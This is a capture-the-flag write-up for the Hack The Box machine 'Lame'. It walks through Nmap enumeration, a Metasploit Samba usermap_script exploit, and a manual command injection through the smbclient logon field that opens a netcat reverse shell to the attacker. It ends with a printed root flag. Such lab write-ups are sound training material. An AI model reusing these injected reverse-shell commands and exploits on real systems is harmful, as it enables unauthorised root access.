Metadata
Difficulty: Easy
OS: Linux
Release Date: 14 Mar, 2017
Enumeration
Nmap
We start by running nmap to discover the open ports on the machine.
┌──(kali㉿kali)-[~/HackTheBox/machines/Lame]
└─$ sudo nmap -sC -sV -oA nmap/initial 10.129.45.211
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-11 21:00 EST
Nmap scan report for 10.129.45.211
Host is up (0.11s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.4
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2024-02-11T21:01:00-05:00
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 2h30m29s, deviation: 3h32m12s, median: 26s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.74 seconds
From the Nmap scan, we discovered 4 open ports of interest.
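As an added example (not part of the original write-up), the following Python script triages the scan output above the way a defender reviewing their own assets would: it parses the port table plus the two script lines that matter and flags the four conditions the enumeration below walks through one by one (anonymous FTP, the vsftpd 2.3.4 banner, a Samba version inside the range searchsploit reports for the username map script issue, and disabled SMB signing). The issue labels and the version-range check are mine; the scan text is the one shown above.

```python
import re

# Excerpt of the Nmap output above (port table plus two script lines);
# the version banners are verbatim from the scan.
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
| smb-security-mode:
|_ message_signing: disabled (dangerous, but default)
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")
VER_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")

def parse_ports(text):
    """Map port number -> (service, version banner) for every open port."""
    ports = {}
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m and m.group(3) == "open":
            ports[int(m.group(1))] = (m.group(4), m.group(5).strip())
    return ports

def version_of(banner):
    """First dotted x.y.z in a banner as an int tuple, or None ('3.X' has none)."""
    m = VER_RE.search(banner)
    return tuple(int(g) for g in m.groups()) if m else None

def triage(text):
    """Return (port, issue) pairs for the weaknesses this scan exposes."""
    findings = []
    for port, (service, banner) in parse_ports(text).items():
        ver = version_of(banner)
        # vsftpd 2.3.4 is the exact version searchsploit lists for the backdoor.
        if service == "ftp" and "vsftpd" in banner and ver == (2, 3, 4):
            findings.append((port, "vsftpd-2.3.4-backdoor"))
        # Samba 3.0.20 up to (not including) 3.0.25: 'username map script' RCE.
        if "Samba" in banner and ver and (3, 0, 20) <= ver < (3, 0, 25):
            findings.append((port, "samba-username-map-script"))
    if "Anonymous FTP login allowed" in text:
        findings.append((21, "anonymous-ftp-login"))
    if re.search(r"message_signing:\s*disabled", text):
        findings.append((445, "smb-signing-disabled"))
    return findings
```

Running `triage(NMAP_OUTPUT)` yields the four findings in the order ports appear, which is the same list of issues the FTP and SMB sections below reach by hand.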
Port 21/TCP - FTP
Since FTP allows anonymous login, it was worth looking for interesting files, but the directory was empty.
┌──(kali㉿kali)-[~/HackTheBox/machines/Lame]
└─$ ftp 10.129.45.211
Connected to 10.129.45.211.
220 (vsFTPd 2.3.4)
Name (10.129.45.211:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -a
229 Entering Extended Passive Mode (|||15817|).
150 Here comes the directory listing.
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 .
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 ..
226 Directory send OK.
ftp>
We also have the FTP version from the scan. Running searchsploit against that version, we found an exploit.
┌──(kali㉿kali)-[~/HackTheBox/machines/Lame]
└─$ searchsploit vsftpd 2.3.4
------------------------------------------------------------
Exploit Title
------------------------------------------------------------
vsftpd 2.3.4 - Backdoor Command Execution
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)
------------------------------------------------------------
Shellcodes: No Results
Port 139,445/TCP - SMB
Running smbmap, we discovered one share we can access without credentials. We couldn't find anything interesting when accessing the share with smbclient.
┌──(kali㉿kali)-[~/HackTheBox/machines/Lame]
└─$ smbclient -N //10.129.45.211/tmp
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun Feb 11 23:44:47 2024
.. DR 0 Sat Oct 31 03:33:58 2020
.ICE-unix DH 0 Sun Feb 11 20:58:40 2024
vmware-root DR 0 Sun Feb 11 20:58:48 2024
.X11-unix DH 0 Sun Feb 11 20:59:06 2024
.X0-lock HR 11 Sun Feb 11 20:59:06 2024
5670.jsvc_up R 0 Sun Feb 11 20:59:54 2024
vgauthsvclog.txt.0 R 1600 Sun Feb 11 20:58:39 2024
7282168 blocks of size 1024. 5385872 blocks available
smb: \>
Running searchsploit against the Samba version:
┌──(kali㉿kali)-[~/HackTheBox/machines/Lame]
└─$ searchsploit Samba 3.0.20
-------------------------------------------------------------------
Exploit Title
-------------------------------------------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution
Samba < 3.0.20 - Remote Heap Overflow
Samba < 3.6.2 (x86) - Denial of Service (PoC)
-------------------------------------------------------------------
Shellcodes: No Results
The following exploit looks promising:
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)
Exploitation
vsftpd 2.3.4
I tried executing the exploit we found during the enumeration phase, but no session was created.
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.129.45.211
RHOSTS => 10.129.45.211
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 10.129.45.211:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.129.45.211:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
Samba 3.0.20
Running the Metasploit exploit we discovered, after setting the necessary options, opened a root shell on the vulnerable machine.
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.129.45.211
RHOSTS => 10.129.45.211
msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.14.4
LHOST => 10.10.14.4
msf6 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP handler on 10.10.14.4:4444
[*] Command shell session 1 opened (10.10.14.4:4444 -> 10.129.45.211:34448) at 2024-02-12 00:51:43 -0500
shell
[*] Trying to find binary 'python' on the target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary 'bash' on the target machine
[*] Found bash at /bin/bash
root@lame:/# id
id
uid=0(root) gid=0(root)
root@lame:/#
Manual Exploitation (Without Metasploit)
For this exploit, we will be crafting the payload from this Ruby script.
We have access to the /tmp directory through anonymous login. After accessing the directory, we use the help command to see what we can do from the shell.
┌──(kali㉿kali)-[~/HackTheBox/machines/Lame/exploits]
└─$ smbclient -N //10.129.45.211/tmp
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> help
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del deltree dir
du echo exit get getfacl
geteas hardlink help history iosize
lcd link lock lowercase ls
l mask md mget mkdir
more mput newer notify open
posix posix_encrypt posix_open posix_mkdir posix_rmdir
posix_unlink posix_whoami print prompt put
pwd q queue quit readlink
rd recurse reget rename reput
rm rmdir showacls setea setmode
scopy stat symlink tar tarmode
timeout translate unlock volume vuid
wdel logon listconnect showconnect tcon
tdis tid utimes logoff ..
!
smb: \>
The logon command can be used to get a reverse connection to our local machine. To do that, we first set up a listener on our local machine:
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 4455
listening on [any] 4455 ...
We can use the following command to get a reverse shell:
logon "./=`nohup nc -e /bin/bash <IP> <port>`"
smb: \> logon "./=`nohup nc -e /bin/bash 10.10.14.4 4455`"
Password:
We can confirm the received connection on the netcat listener.
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 4455
listening on [any] 4455 ...
connect to [10.10.14.4] from (UNKNOWN) [10.129.45.211] 42732
id
uid=0(root) gid=0(root)
Spawning a TTY Shell
Python
python -c 'import pty; pty.spawn("/bin/bash")'
(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
Proof
root@lame:/root# hostname && whoami && cat root.txt && ip a
lame
root
18a4d9ed44993e8ba38336021d0b3b46
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 00:50:56:96:65:74 brd ff:ff:ff:ff:ff:ff
inet 10.129.45.211/16 brd 10.129.255.255 scope global eth0
inet6 dead:beef::250:56ff:fe96:6574/64 scope global dynamic
valid_lft 86396sec preferred_lft 14396sec
inet6 fe80::250:56ff:fe96:6574/64 scope link
valid_lft forever preferred_lft forever
root@lame:/root#